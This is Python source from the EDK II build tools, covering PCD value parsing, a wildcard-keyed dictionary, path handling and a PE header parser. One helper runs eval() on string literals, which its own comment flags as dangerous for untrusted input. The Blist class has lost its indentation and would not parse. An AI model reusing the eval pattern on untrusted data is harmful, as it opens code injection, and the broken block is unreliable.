    ## pop is forbidden: entries may only be reset, never removed
    def pop(self, key, *dv):
        EdkLogger.error("RestrictedDict", ATTRIBUTE_ACCESS_DENIED, ExtraData="pop")
    ## popitem is forbidden: entries may only be reset, never removed
    def popitem(self):
        EdkLogger.error("RestrictedDict", ATTRIBUTE_ACCESS_DENIED, ExtraData="popitem")
## Dictionary using prioritized list as key
#
class tdict:
    """A nested dictionary keyed by a fixed number (_Level_) of key components.

    At every level, None and any name in _ValidWildcardList are normalized to
    the wildcard key 'COMMON'.  In single mode (_Single_ True) a lookup
    returns one best-match value, preferring an exact first-key match and
    falling back to the wildcard entry; in greedy mode it returns a list of
    every matching value.
    """
    _ListType = type([])
    _TupleType = type(())
    # Canonical wildcard key; all aliases below normalize to it.
    _Wildcard = 'COMMON'
    _ValidWildcardList = ['COMMON', 'DEFAULT', 'ALL', '*', 'PLATFORM']
    def __init__(self, _Single_=False, _Level_=2):
        # _Level_: number of key components; data maps first key -> sub-tdict
        # (or directly to the value when _Level_ == 1).
        self._Level_ = _Level_
        self.data = {}
        self._Single_ = _Single_
    # =[] operator
    def __getitem__(self, key):
        KeyType = type(key)
        RestKeys = None
        if KeyType == self._ListType or KeyType == self._TupleType:
            FirstKey = key[0]
            if len(key) > 1:
                RestKeys = key[1:]
            elif self._Level_ > 1:
                # Missing trailing components default to the wildcard.
                RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
        else:
            FirstKey = key
            if self._Level_ > 1:
                RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
        # Normalize wildcard aliases (and None) to the canonical wildcard.
        if FirstKey == None or str(FirstKey).upper() in self._ValidWildcardList:
            FirstKey = self._Wildcard
        if self._Single_:
            return self._GetSingleValue(FirstKey, RestKeys)
        else:
            return self._GetAllValues(FirstKey, RestKeys)
    def _GetSingleValue(self, FirstKey, RestKeys):
        """Return one value: exact first-key match first, then wildcard; a
        wildcard first key scans every sub-entry until something is found."""
        Value = None
        #print "%s-%s" % (FirstKey, self._Level_) ,
        if self._Level_ > 1:
            if FirstKey == self._Wildcard:
                if FirstKey in self.data:
                    Value = self.data[FirstKey][RestKeys]
                if Value == None:
                    # Wildcard query: accept the first sub-entry that resolves.
                    for Key in self.data:
                        Value = self.data[Key][RestKeys]
                        if Value != None: break
            else:
                if FirstKey in self.data:
                    Value = self.data[FirstKey][RestKeys]
                if Value == None and self._Wildcard in self.data:
                    #print "Value=None"
                    Value = self.data[self._Wildcard][RestKeys]
        else:
            # Leaf level: entries are the stored values themselves.
            if FirstKey == self._Wildcard:
                if FirstKey in self.data:
                    Value = self.data[FirstKey]
                if Value == None:
                    for Key in self.data:
                        Value = self.data[Key]
                        if Value != None: break
            else:
                if FirstKey in self.data:
                    Value = self.data[FirstKey]
                elif self._Wildcard in self.data:
                    Value = self.data[self._Wildcard]
        return Value
    def _GetAllValues(self, FirstKey, RestKeys):
        """Return a list of all values matching the key chain, including
        wildcard entries alongside exact matches."""
        Value = []
        if self._Level_ > 1:
            if FirstKey == self._Wildcard:
                for Key in self.data:
                    Value += self.data[Key][RestKeys]
            else:
                if FirstKey in self.data:
                    Value += self.data[FirstKey][RestKeys]
                if self._Wildcard in self.data:
                    Value += self.data[self._Wildcard][RestKeys]
        else:
            # Leaf level: append stored values directly.
            if FirstKey == self._Wildcard:
                for Key in self.data:
                    Value.append(self.data[Key])
            else:
                if FirstKey in self.data:
                    Value.append(self.data[FirstKey])
                if self._Wildcard in self.data:
                    Value.append(self.data[self._Wildcard])
        return Value
    ## []= operator
    def __setitem__(self, key, value):
        KeyType = type(key)
        RestKeys = None
        if KeyType == self._ListType or KeyType == self._TupleType:
            FirstKey = key[0]
            if len(key) > 1:
                RestKeys = key[1:]
            else:
                # Missing trailing components default to the wildcard.
                RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
        else:
            FirstKey = key
            if self._Level_ > 1:
                RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
        if FirstKey in self._ValidWildcardList:
            FirstKey = self._Wildcard
        # Lazily create the sub-tdict for a first key never seen before.
        if FirstKey not in self.data and self._Level_ > 0:
            self.data[FirstKey] = tdict(self._Single_, self._Level_ - 1)
        if self._Level_ > 1:
            self.data[FirstKey][RestKeys] = value
        else:
            self.data[FirstKey] = value
    ## Switch this tdict (and all sub-tdicts) to return-all-matches mode
    def SetGreedyMode(self):
        self._Single_ = False
        if self._Level_ > 1:
            for Key in self.data:
                self.data[Key].SetGreedyMode()
    ## Switch this tdict (and all sub-tdicts) to best-single-match mode
    def SetSingleMode(self):
        self._Single_ = True
        if self._Level_ > 1:
            for Key in self.data:
                self.data[Key].SetSingleMode()
    ## Collect the set of keys used at nesting depth KeyIndex
    def GetKeys(self, KeyIndex=0):
        assert KeyIndex >= 0
        if KeyIndex == 0:
            return set(self.data.keys())
        else:
            keys = set()
            for Key in self.data:
                keys |= self.data[Key].GetKeys(KeyIndex - 1)
            return keys
## Boolean chain list
#
class Blist(UserList):
def __init__(self, initlist=None):
UserList.__init__(self, initlist)
def __setitem__(self, i, item):
if item not in [True, False]:
if item == 0:
item = False
else:
item = True
self.data[i] = item
def _GetResult(self):
Value = True
for item in self.data:
Value &= item
return Value
Result = property(_GetResult)
## Extract EFI image names from a console log
#
# Reads Filename line by line and writes a filtered copy to "<Filename>.New":
# a line containing '.efi' is reduced to the text between its last space and
# the '.efi' suffix; every other line is copied through unchanged (each
# written with an extra trailing newline, as before).
#
# @param Filename   Path of the console log to process
#
def ParseConsoleLog(Filename):
    # 'with' guarantees both handles are closed even if a read/write raises;
    # the original code leaked the handles on error.
    with open(os.path.normpath(Filename), 'r') as Opr, \
         open(os.path.normpath(Filename + '.New'), 'w+') as Opw:
        # Iterate the file directly instead of materializing readlines().
        for Line in Opr:
            if Line.find('.efi') > -1:
                Line = Line[Line.rfind(' ') : Line.rfind('.efi')].strip()
            Opw.write('%s\n' % Line)
## Split a PCD setting string on TAB_VALUE_SPLIT at top level only
#
# Separators inside double-quoted strings or inside parentheses are NOT
# treated as field boundaries.  A masked copy of the string (protected
# separators replaced by '-') is built purely to locate the real split
# points; the returned fields are sliced from the original Setting, so their
# content is untouched.
#
# @param Setting    The raw PCD setting string
#
# @retval list      The stripped top-level fields of Setting
#
def AnalyzePcdExpression(Setting):
    Setting = Setting.strip()
    # Neutralize escaped backslashes and escaped quotes so the in-string
    # detector below only reacts to real quote characters.
    Escaped = Setting.replace('\\\\', '//').replace('\\\"', '\\\'')
    MaskChars = []
    InString = False
    ParenDepth = 0
    for Char in Escaped:
        if Char == '"':
            InString = not InString
        elif Char == '(' and not InString:
            ParenDepth += 1
        elif Char == ')' and not InString:
            ParenDepth -= 1
        # Hide protected separators so the scan below skips them.
        if Char == TAB_VALUE_SPLIT and (ParenDepth > 0 or InString):
            MaskChars.append('-')
        else:
            MaskChars.append(Char)
    Masked = ''.join(MaskChars)
    FieldList = []
    FieldStart = 0
    while True:
        # Find split points in the masked copy, slice from the original.
        SplitPos = Masked.find(TAB_VALUE_SPLIT, FieldStart)
        if SplitPos < 0:
            FieldList.append(Setting[FieldStart:].strip())
            return FieldList
        FieldList.append(Setting[FieldStart:SplitPos].strip())
        FieldStart = SplitPos + 1
def ParseDevPathValue (Value):
    """Placeholder for converting a DEVICE_PATH(...) text value to its binary
    form; not implemented in this revision, so callers always get None."""
    pass
def ParseFieldValue (Value):
    """Parse a PCD field value string into a (Value, SizeInBytes) pair.

    Accepted forms: plain integers; UINT8/16/32/64(...) wrappers; GUID(...)
    in registry or C-struct form; L"..."/"..." strings; L'...'/'...'
    character constants; {...} byte arrays; DEVICE_PATH(...); hex/decimal
    literals; TRUE/FALSE.  Anything unrecognized is returned unchanged with
    size 1.  Raises BadExpression for malformed input.

    NOTE: this function uses Python-2-only constructs (<> operator,
    'except E, v' syntax, integer '/') and must not be ported blindly.
    """
    if type(Value) == type(0):
        # Already an integer: size is the minimal number of whole bytes.
        return Value, (Value.bit_length() + 7) / 8
    if type(Value) <> type(''):
        raise BadExpression('Type %s is %s' %(Value, type(Value)))
    Value = Value.strip()
    if Value.startswith('UINT8') and Value.endswith(')'):
        # Recursively parse the wrapped value, then enforce the width.
        Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
        if Size > 1:
            raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
        return Value, 1
    if Value.startswith('UINT16') and Value.endswith(')'):
        Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
        if Size > 2:
            raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
        return Value, 2
    if Value.startswith('UINT32') and Value.endswith(')'):
        Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
        if Size > 4:
            raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
        return Value, 4
    if Value.startswith('UINT64') and Value.endswith(')'):
        Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
        if Size > 8:
            raise BadExpression('Value (%s) Size larger than %d' % (Value, Size))
        return Value, 8
    if Value.startswith('GUID') and Value.endswith(')'):
        Value = Value.split('(', 1)[1][:-1].strip()
        if Value[0] == '{' and Value[-1] == '}':
            # C-struct form {aa, bb, cc, {dd, ...}}: rebuild the canonical
            # "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx" registry string.
            Value = Value[1:-1].strip()
            Value = Value.split('{', 1)
            Value = ['%02x' % int(Item, 16) for Item in (Value[0] + Value[1][:-1]).split(',')]
            if len(Value[0]) != 8:
                Value[0] = '%08X' % int(Value[0], 16)
            if len(Value[1]) != 4:
                Value[1] = '%04X' % int(Value[1], 16)
            if len(Value[2]) != 4:
                Value[2] = '%04X' % int(Value[2], 16)
            Value = '-'.join(Value[0:3]) + '-' + ''.join(Value[3:5]) + '-' + ''.join(Value[5:11])
        if Value[0] == '"' and Value[-1] == '"':
            Value = Value[1:-1]
        try:
            # Re-parse the 16 little-endian GUID bytes as a character constant.
            Value = "'" + uuid.UUID(Value).get_bytes_le() + "'"
        except ValueError, Message:
            raise BadExpression('%s' % Message)
        Value, Size = ParseFieldValue(Value)
        return Value, 16
    if Value.startswith('L"') and Value.endswith('"'):
        # Unicode String: pack 16-bit code units, size includes NUL terminator.
        List = list(Value[2:-1])
        List.reverse()
        Value = 0
        for Char in List:
            Value = (Value << 16) | ord(Char)
        return Value, (len(List) + 1) * 2
    if Value.startswith('"') and Value.endswith('"'):
        # ASCII String: pack 8-bit chars, size includes NUL terminator.
        List = list(Value[1:-1])
        List.reverse()
        Value = 0
        for Char in List:
            Value = (Value << 8) | ord(Char)
        return Value, len(List) + 1
    if Value.startswith("L'") and Value.endswith("'"):
        # Unicode Character Constant: like L"..." but with no NUL terminator.
        List = list(Value[2:-1])
        List.reverse()
        Value = 0
        for Char in List:
            Value = (Value << 16) | ord(Char)
        return Value, len(List) * 2
    if Value.startswith("'") and Value.endswith("'"):
        # Character constant: like "..." but with no NUL terminator.
        List = list(Value[1:-1])
        List.reverse()
        Value = 0
        for Char in List:
            Value = (Value << 8) | ord(Char)
        return Value, len(List)
    if Value.startswith('{') and Value.endswith('}'):
        # Byte array: each item parsed recursively and packed little-endian.
        Value = Value[1:-1]
        List = [Item.strip() for Item in Value.split(',')]
        List.reverse()
        Value = 0
        RetSize = 0
        for Item in List:
            ItemValue, Size = ParseFieldValue(Item)
            RetSize += Size
            for I in range(Size):
                Value = (Value << 8) | ((ItemValue >> 8 * I) & 0xff)
        return Value, RetSize
    if Value.startswith('DEVICE_PATH(') and Value.endswith(')'):
        Value = Value.split('"')[1]
        return ParseDevPathValue(Value)
    if Value.lower().startswith('0x'):
        Value = int(Value, 16)
        if Value == 0:
            return 0, 1
        return Value, (Value.bit_length() + 7) / 8
    if Value[0].isdigit():
        Value = int(Value, 10)
        if Value == 0:
            return 0, 1
        return Value, (Value.bit_length() + 7) / 8
    if Value.lower() == 'true':
        return 1, 1
    if Value.lower() == 'false':
        return 0, 1
    # Unrecognized: hand the raw string back with a nominal size of 1.
    return Value, 1
## AnalyzeDscPcd
#
# Analyze DSC PCD value, since there is no data type info in DSC
# This function is used to match functions (AnalyzePcdData, AnalyzeHiiPcdData, AnalyzeVpdPcdData) used for retrieving PCD value from database
# 1. Feature flag: TokenSpace.PcdCName|PcdValue
# 2. Fix and Patch:TokenSpace.PcdCName|PcdValue[|MaxSize]
# 3. Dynamic default:
#    TokenSpace.PcdCName|PcdValue[|VOID*[|MaxSize]]
#    TokenSpace.PcdCName|PcdValue
# 4. Dynamic VPD:
#    TokenSpace.PcdCName|VpdOffset[|VpdValue]
#    TokenSpace.PcdCName|VpdOffset[|MaxSize[|VpdValue]]
# 5. Dynamic HII:
#    TokenSpace.PcdCName|HiiString|VariableGuid|VariableOffset[|HiiValue]
# PCD value needs to be located in such kind of string, and the PCD value might be an expression in which
#    there might have "|" operator, also in string value.
#
# @param Setting: String contain information described above with "TokenSpace.PcdCName|" stripped
# @param PcdType: PCD type: feature, fixed, dynamic default VPD HII
# @param DataType: The datum type of PCD: VOID*, UNIT, BOOL
# @retval:
#   ValueList: A List contain fields described above
#   IsValid:   True if conforming EBNF, otherwise False
#   Index:     The index where PcdValue is in ValueList
#
def AnalyzeDscPcd(Setting, PcdType, DataType=''):
    # Top-level split that respects '|' inside quotes and parentheses.
    FieldList = AnalyzePcdExpression(Setting)
    IsValid = True
    if PcdType in (MODEL_PCD_FIXED_AT_BUILD, MODEL_PCD_PATCHABLE_IN_MODULE, MODEL_PCD_FEATURE_FLAG):
        # Form: Value[|MaxSize] or Value[|DataType[|MaxSize]]
        Value = FieldList[0]
        Size = ''
        if len(FieldList) > 1:
            # Second field is a size if it looks numeric, otherwise a type.
            if FieldList[1].upper().startswith("0X") or FieldList[1].isdigit():
                Size = FieldList[1]
            else:
                DataType = FieldList[1]
        if len(FieldList) > 2:
            Size = FieldList[2]
        if DataType == "":
            IsValid = (len(FieldList) <= 1)
        else:
            IsValid = (len(FieldList) <= 3)
#        Value, Size = ParseFieldValue(Value)
        if Size:
            # Size must parse as a hex or decimal integer.
            try:
                int(Size,16) if Size.upper().startswith("0X") else int(Size)
            except:
                IsValid = False
                Size = -1
        # PcdValue lives at index 0 of the returned list.
        return [str(Value), '', str(Size)], IsValid, 0
    elif PcdType in (MODEL_PCD_DYNAMIC_DEFAULT, MODEL_PCD_DYNAMIC_EX_DEFAULT):
        # Form: Value[|DatumType[|MaxSize]]
        Value = FieldList[0]
        Size = Type = ''
        if len(FieldList) > 1:
            Type = FieldList[1]
        else:
            Type = DataType
        if len(FieldList) > 2:
            Size = FieldList[2]
        else:
            # No explicit size for VOID*: derive it from the value literal.
            if Type == 'VOID*':
                if Value.startswith("L"):
                    # L"..." payload length plus NUL, two bytes per char.
                    Size = str((len(Value)- 3 + 1) * 2)
                elif Value.startswith("{"):
                    # Byte array: one byte per comma-separated element.
                    Size = str(len(Value.split(",")))
                else:
                    # "..." payload length plus NUL terminator.
                    Size = str(len(Value) -2 + 1 )
        if DataType == "":
            IsValid = (len(FieldList) <= 1)
        else:
            IsValid = (len(FieldList) <= 3)
        if Size:
            try:
                int(Size,16) if Size.upper().startswith("0X") else int(Size)
            except:
                IsValid = False
                Size = -1
        # PcdValue lives at index 0 of the returned list.
        return [Value, Type, str(Size)], IsValid, 0
    elif PcdType in (MODEL_PCD_DYNAMIC_VPD, MODEL_PCD_DYNAMIC_EX_VPD):
        # Form: VpdOffset[|VpdValue] or VpdOffset[|MaxSize[|VpdValue]] (VOID*)
        VpdOffset = FieldList[0]
        Value = Size = ''
        if not DataType == 'VOID*':
            if len(FieldList) > 1:
                Value = FieldList[1]
        else:
            if len(FieldList) > 1:
                Size = FieldList[1]
            if len(FieldList) > 2:
                Value = FieldList[2]
        if DataType == "":
            IsValid = (len(FieldList) <= 1)
        else:
            IsValid = (len(FieldList) <= 3)
        if Size:
            try:
                int(Size,16) if Size.upper().startswith("0X") else int(Size)
            except:
                IsValid = False
                Size = -1
        # PcdValue lives at index 2 of the returned list.
        return [VpdOffset, str(Size), Value], IsValid, 2
    elif PcdType in (MODEL_PCD_DYNAMIC_HII, MODEL_PCD_DYNAMIC_EX_HII):
        # Form: HiiString|VariableGuid|VariableOffset[|HiiValue[|Attribute]]
        HiiString = FieldList[0]
        Guid = Offset = Value = Attribute = ''
        if len(FieldList) > 1:
            Guid = FieldList[1]
        if len(FieldList) > 2:
            Offset = FieldList[2]
        if len(FieldList) > 3:
            Value = FieldList[3]
        if len(FieldList) > 4:
            Attribute = FieldList[4]
        IsValid = (3 <= len(FieldList) <= 5)
        # PcdValue lives at index 3 of the returned list.
        return [HiiString, Guid, Offset, Value, Attribute], IsValid, 3
    # Unknown PCD type: nothing parsed, flagged invalid.
    return [], False, 0
## AnalyzePcdData
#
# Split a "Value|DatumType|TokenNumber" PCD setting, tolerating a leading
# quoted value that itself contains '|' (e.g. L"a|b").  Such a value is cut
# out before splitting and restored into field 0 afterwards.
#
# @param[in] Setting: A String contain value/datum type/token number information;
#
# @retval ValueList: A List contain value, datum type and token number.
#
def AnalyzePcdData(Setting):
    ValueList = [''] * 3
    QuotedValueRe = re.compile(r'^\s*L?\".*\|.*\"')
    QuotedMatches = QuotedValueRe.findall(Setting)
    if QuotedMatches:
        # Strip the quoted value so its embedded '|' cannot confuse the
        # split below; it is restored into slot 0 at the end.
        Setting = re.sub(QuotedValueRe, '', Setting)
    Fields = Setting.split(TAB_VALUE_SPLIT)
    ValueList[0:len(Fields)] = Fields
    if QuotedMatches:
        ValueList[0] = QuotedMatches[0]
    return ValueList
## AnalyzeHiiPcdData
#
# Split an HII PCD setting into VariableName, VariableGuid, VariableOffset
# and DefaultValue; missing trailing fields default to the empty string.
#
# @param[in] Setting: A String contain VariableName, VariableGuid, VariableOffset, DefaultValue information;
#
# @retval ValueList: A List containing VariableName, VariableGuid, VariableOffset, DefaultValue.
#
def AnalyzeHiiPcdData(Setting):
    Fields = GetSplitValueList(Setting)
    Result = [''] * 4
    Result[0:len(Fields)] = Fields
    return Result
## AnalyzeVpdPcdData
#
# Split a VPD PCD setting into VpdOffset, MaxDatumSize and InitialValue,
# tolerating a trailing quoted value that itself contains '|'.  Such a value
# is cut out before splitting and restored into field 2 afterwards.
#
# @param[in] Setting: A String contain VpdOffset/MaxDatumSize/InitialValue information;
#
# @retval ValueList: A List contain VpdOffset, MaxDatumSize and InitialValue.
#
def AnalyzeVpdPcdData(Setting):
    ValueList = [''] * 3
    QuotedValueRe = re.compile(r'\s*L?\".*\|.*\"\s*$')
    QuotedMatches = QuotedValueRe.findall(Setting)
    if QuotedMatches:
        # Strip the quoted value so its embedded '|' cannot confuse the
        # split below; it is restored into slot 2 at the end.
        Setting = re.sub(QuotedValueRe, '', Setting)
    Fields = Setting.split(TAB_VALUE_SPLIT)
    ValueList[0:len(Fields)] = Fields
    if QuotedMatches:
        ValueList[2] = QuotedMatches[0]
    return ValueList
## Validate a PCD value string against its declared datum type
#
# @param Type    Datum type name: VOID*, BOOLEAN, one of the UINT types, or
#                anything else (treated as a structure PCD)
# @param Value   The value text to validate
#
# @retval (True, "")             Value is well-formed for Type
# @retval (True, "StructurePcd") Type is none of the basic types
# @retval (False, reason)        Value is malformed; reason explains why
#
def CheckPcdDatum(Type, Value):
    if Type == "VOID*":
        IsString = (Value.startswith('L"') or Value.startswith('"')) and Value.endswith('"')
        IsArray = Value.startswith('{') and Value.endswith('}')
        if not IsString and not IsArray:
            return False, "Invalid value [%s] of type [%s]; must be in the form of {...} for array"\
                          ", or \"...\" for string, or L\"...\" for unicode string" % (Value, Type)
        if re.match(r'\s*L?\".*\"\s*$', Value):
            # Check that every character of the quoted payload is printable.
            Payload = Value[2:-1] if Value.startswith("L") else Value[1:-1]
            Printset = set(string.printable)
            Printset.remove(TAB_PRINTCHAR_VT)
            Printset.add(TAB_PRINTCHAR_BS)
            Printset.add(TAB_PRINTCHAR_NUL)
            if not set(Payload).issubset(Printset):
                PrintList = sorted(Printset)
                return False, "Invalid PCD string value of type [%s]; must be printable chars %s." % (Type, PrintList)
    elif Type == 'BOOLEAN':
        if Value not in ['TRUE', 'True', 'true', '0x1', '0x01', '1', 'FALSE', 'False', 'false', '0x0', '0x00', '0']:
            return False, "Invalid value [%s] of type [%s]; must be one of TRUE, True, true, 0x1, 0x01, 1"\
                          ", FALSE, False, false, 0x0, 0x00, 0" % (Value, Type)
    elif Type in [TAB_UINT8, TAB_UINT16, TAB_UINT32, TAB_UINT64]:
        try:
            # Python2 long() with base 0 accepts hex, decimal and octal.
            Value = long(Value, 0)
        except:
            return False, "Invalid value [%s] of type [%s];"\
                          " must be a hexadecimal, decimal or octal in C language format." % (Value, Type)
    else:
        return True, "StructurePcd"
    return True, ""
## Split command line option string to list
#
# subprocess.Popen needs the args to be a sequence. Otherwise there's problem
# in non-windows platform to launch command.  A new option is assumed to
# start at each '/' or '-' that follows whitespace; text inside single or
# double quotes never starts a new option.
#
# @param OptionString   The complete command line option text
#
# @retval list          The individual option strings
#
def SplitOption(OptionString):
    OptionList = []
    PrevChar = " "
    OptionStart = 0
    QuoteChar = ""
    for Index, Char in enumerate(OptionString):
        if Char in ['"', "'"]:
            # Toggle the quoted region; only the matching quote kind closes it.
            if QuoteChar == Char:
                QuoteChar = ""
            elif QuoteChar == "":
                QuoteChar = Char
            continue
        if QuoteChar:
            # Inside quotes nothing can start a new option.
            continue
        if Char in ["/", "-"] and PrevChar in [" ", "\t", "\r", "\n"]:
            if Index > OptionStart:
                # Emit the previous option, dropping the whitespace separator.
                OptionList.append(OptionString[OptionStart:Index - 1])
            OptionStart = Index
        PrevChar = Char
    OptionList.append(OptionString[OptionStart:])
    return OptionList
## Return the longest common leading directory of a list of paths
#
# @param PathList   Non-empty list of path strings
#
# @retval string    The shared prefix components joined with os.path.sep
#
def CommonPath(PathList):
    # min()/max() give the lexicographically smallest and largest paths; any
    # component shared by those two is shared by every path in between.
    P1 = min(PathList).split(os.path.sep)
    P2 = max(PathList).split(os.path.sep)
    # range() replaces the Python2-only xrange(): identical iteration there,
    # and the function now also runs under Python 3.
    for Index in range(min(len(P1), len(P2))):
        if P1[Index] != P2[Index]:
            return os.path.sep.join(P1[:Index])
    return os.path.sep.join(P1)
#
# Convert string to C format array
#
def ConvertStringToByteArray(Value):
    """Convert a value string into a C-style byte-array literal.

    '{1, 2}' -> '{1,2}'     (elements re-parsed as C integer literals)
    '"AB"'   -> '{65,66,0}' (ASCII codes plus NUL terminator)
    'L"AB"'  -> '{65,66,0}' (16-bit codes plus NUL terminator)
    Returns None for empty or malformed input.
    """
    Value = Value.strip()
    if not Value:
        return None
    if Value[0] == '{':
        # Already an array literal: normalize every element to decimal.
        if not Value.endswith('}'):
            return None
        Body = Value.replace(' ', '').replace('{', '').replace('}', '')
        Elements = Body.split(',')
        try:
            Elements = [str(int(Element, 0)) for Element in Elements]
        except ValueError:
            return None
        return '{' + ','.join(Elements) + '}'
    Unicode = False
    if Value.startswith('L"'):
        if not Value.endswith('"'):
            return None
        Value = Value[1:]
        Unicode = True
    elif not Value.startswith('"') or not Value.endswith('"'):
        return None
    # SECURITY NOTE: eval() is used here to expand escape sequences in the
    # quoted literal; it will execute arbitrary expressions if Value ever
    # comes from an untrusted source.
    Value = eval(Value) # translate escape character
    Mask = 0x10000 if Unicode else 0x100
    Codes = [str(ord(Char) % Mask) for Char in Value]
    # Append the NUL terminator element before closing the array.
    return '{' + ','.join(Codes + ['0']) + '}'
class PathClass(object):
    """A file path split into Root (workspace/package root) and File (the
    part under Root), with derived Dir/Name/BaseName/Ext members and build
    metadata (Arch, Target, TagName, ToolCode, ToolChainFamily).

    Equality and hashing are based solely on the normalized Path string.
    """
    def __init__(self, File='', Root='', AlterRoot='', Type='', IsBinary=False,
                 Arch='COMMON', ToolChainFamily='', Target='', TagName='', ToolCode=''):
        self.Arch = Arch
        self.File = str(File)
        # An absolute File overrides any supplied roots.
        if os.path.isabs(self.File):
            self.Root = ''
            self.AlterRoot = ''
        else:
            self.Root = str(Root)
            self.AlterRoot = str(AlterRoot)
        # Remove any '.' and '..' in path
        if self.Root:
            # mws.getWs resolves the workspace directory for this file.
            self.Root = mws.getWs(self.Root, self.File)
            self.Path = os.path.normpath(os.path.join(self.Root, self.File))
            self.Root = os.path.normpath(CommonPath([self.Root, self.Path]))
            # eliminate the side-effect of 'C:'
            if self.Root[-1] == ':':
                self.Root += os.path.sep
            # file path should not start with path separator
            if self.Root[-1] == os.path.sep:
                self.File = self.Path[len(self.Root):]
            else:
                self.File = self.Path[len(self.Root) + 1:]
        else:
            self.Path = os.path.normpath(self.File)
        # Derived components of the (possibly re-rooted) File.
        self.SubDir, self.Name = os.path.split(self.File)
        self.BaseName, self.Ext = os.path.splitext(self.Name)
        if self.Root:
            if self.SubDir:
                self.Dir = os.path.join(self.Root, self.SubDir)
            else:
                self.Dir = self.Root
        else:
            self.Dir = self.SubDir
        # Binary files carry an explicit Type; source files use the extension.
        if IsBinary:
            self.Type = Type
        else:
            self.Type = self.Ext.lower()
        self.IsBinary = IsBinary
        self.Target = Target
        self.TagName = TagName
        self.ToolCode = ToolCode
        self.ToolChainFamily = ToolChainFamily
        # Lazily-computed cache for the Key property.
        self._Key = None
    ## Convert the object of this class to a string
    #
    #  Convert member Path of the class to a string
    #
    #  @retval string Formatted String
    #
    def __str__(self):
        return self.Path
    ## Override __eq__ function
    #
    # Check whether PathClass are the same (comparison is by Path string;
    # a non-PathClass operand is compared against str(Other))
    #
    # @retval False The two PathClass are different
    # @retval True  The two PathClass are the same
    #
    def __eq__(self, Other):
        if type(Other) == type(self):
            return self.Path == Other.Path
        else:
            return self.Path == str(Other)
    ## Override __cmp__ function
    #
    # Customize the comparison operation of two PathClass (ordered by the
    # Path string)
    #
    # @retval 0     The two PathClass are equal
    # @retval -1    The first PathClass is less than the second PathClass
    # @retval 1     The first PathClass is bigger than the second PathClass
    def __cmp__(self, Other):
        if type(Other) == type(self):
            OtherKey = Other.Path
        else:
            OtherKey = str(Other)
        SelfKey = self.Path
        if SelfKey == OtherKey:
            return 0
        elif SelfKey > OtherKey:
            return 1
        else:
            return -1
    ## Override __hash__ function
    #
    # Use Path as key in hash table (consistent with __eq__)
    #
    # @retval string Key for hash table
    #
    def __hash__(self):
        return hash(self.Path)
    # Upper-cased Path, computed once and cached in self._Key.
    def _GetFileKey(self):
        if self._Key == None:
            self._Key = self.Path.upper() # + self.ToolChainFamily + self.TagName + self.ToolCode + self.Target
        return self._Key
    # Modification time of the file (os.stat st_mtime, by index).
    def _GetTimeStamp(self):
        return os.stat(self.Path)[8]
    def Validate(self, Type='', CaseSensitive=True):
        """Check that the file exists (via RealPath2) with the expected type
        and on-disk case; refresh the path members from the real file.

        @param Type           Expected file type (extension); '' skips the check
        @param CaseSensitive  Whether the on-disk case must match exactly
                              (forced off when GlobalData.gCaseInsensitive)

        @retval (0, '')                 on success
        @retval (FILE_TYPE_MISMATCH, info) / (FILE_NOT_FOUND, info) /
                (FILE_CASE_MISMATCH, info) otherwise
        """
        if GlobalData.gCaseInsensitive:
            CaseSensitive = False
        if Type and Type.lower() != self.Type:
            return FILE_TYPE_MISMATCH, '%s (expect %s but got %s)' % (self.File, Type, self.Type)
        # Resolve the file against Root, then AlterRoot, on the file system.
        RealFile, RealRoot = RealPath2(self.File, self.Root, self.AlterRoot)
        if not RealRoot and not RealFile:
            # Not found anywhere: rebuild a best-guess path for the report.
            RealFile = self.File
            if self.AlterRoot:
                RealFile = os.path.join(self.AlterRoot, self.File)
            elif self.Root:
                RealFile = os.path.join(self.Root, self.File)
            if len (mws.getPkgPath()) == 0:
                return FILE_NOT_FOUND, os.path.join(self.AlterRoot, RealFile)
            else:
                return FILE_NOT_FOUND, "%s is not found in packages path:\n\t%s" % (self.File, '\n\t'.join(mws.getPkgPath()))
        ErrorCode = 0
        ErrorInfo = ''
        if RealRoot != self.Root or RealFile != self.File:
            # The on-disk spelling differs from ours: report a case mismatch
            # when it matters, then adopt the file system's spelling.
            if CaseSensitive and (RealFile != self.File or (RealRoot != self.Root and RealRoot != self.AlterRoot)):
                ErrorCode = FILE_CASE_MISMATCH
                ErrorInfo = self.File + '\n\t' + RealFile + " [in file system]"
            self.SubDir, self.Name = os.path.split(RealFile)
            self.BaseName, self.Ext = os.path.splitext(self.Name)
            if self.SubDir:
                self.Dir = os.path.join(RealRoot, self.SubDir)
            else:
                self.Dir = RealRoot
            self.File = RealFile
            self.Root = RealRoot
            self.Path = os.path.join(RealRoot, RealFile)
        return ErrorCode, ErrorInfo
    Key = property(_GetFileKey)
    TimeStamp = property(_GetTimeStamp)
## Parse PE image to get the required PE information.
#
class PeImageClass():
    ## Constructor
    #
    # Parses the DOS header, PE signature, COFF file header, optional
    # header and section headers. On success IsValid is True and
    # EntryPoint/SectionAlignment/Size/SectionHeaderList are filled in;
    # on failure IsValid stays False and ErrorInfo describes the problem.
    #
    # @param PeFile FilePath of PeImage
    #
    def __init__(self, PeFile):
        self.FileName = PeFile
        self.IsValid = False
        self.Size = 0
        self.EntryPoint = 0
        self.SectionAlignment = 0
        self.SectionHeaderList = []
        self.ErrorInfo = ''
        try:
            # Fix: narrow the bare 'except:' to open() failures only.
            PeObject = open(PeFile, 'rb')
        except (IOError, OSError):
            self.ErrorInfo = self.FileName + ' can not be found\n'
            return
        try:
            # Fix: the original leaked the file handle on every early
            # return; the finally guarantees it is closed.
            self._ParseHeaders(PeObject)
        finally:
            PeObject.close()

    def _ParseHeaders(self, PeObject):
        # Read DOS header (first 0x3E bytes are enough for what we need).
        ByteArray = array.array('B')
        ByteArray.fromfile(PeObject, 0x3E)
        ByteList = ByteArray.tolist()
        # DOS signature should be 'MZ'
        if self._ByteListToStr (ByteList[0x0:0x2]) != 'MZ':
